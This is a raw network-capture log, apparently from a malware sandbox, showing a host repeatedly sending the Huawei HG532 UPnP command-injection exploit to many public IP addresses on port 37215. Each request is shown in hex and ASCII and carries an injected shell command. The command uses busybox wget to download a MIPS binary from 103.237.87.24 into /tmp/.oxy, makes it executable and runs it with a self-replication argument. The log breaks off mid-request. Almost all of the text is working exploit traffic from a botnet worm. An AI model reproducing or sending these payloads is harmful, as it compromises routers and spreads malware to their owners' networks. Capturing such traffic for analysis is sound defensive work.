20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1392192.168.2.134362841.211.104.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482098103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1393192.168.2.133422441.79.134.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482105017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1394192.168.2.1345820197.33.217.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482104063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1395192.168.2.133822419.38.136.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482197046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1396192.168.2.1354984157.170.240.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482199907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1397192.168.2.1354602197.117.153.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482219934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1398192.168.2.1336606157.10.108.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482222080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1399192.168.2.1354492157.88.171.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482234955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1400192.168.2.1347422197.165.241.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482340097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1401192.168.2.1339548197.93.139.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482342958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1402192.168.2.133301241.33.34.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.482363939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
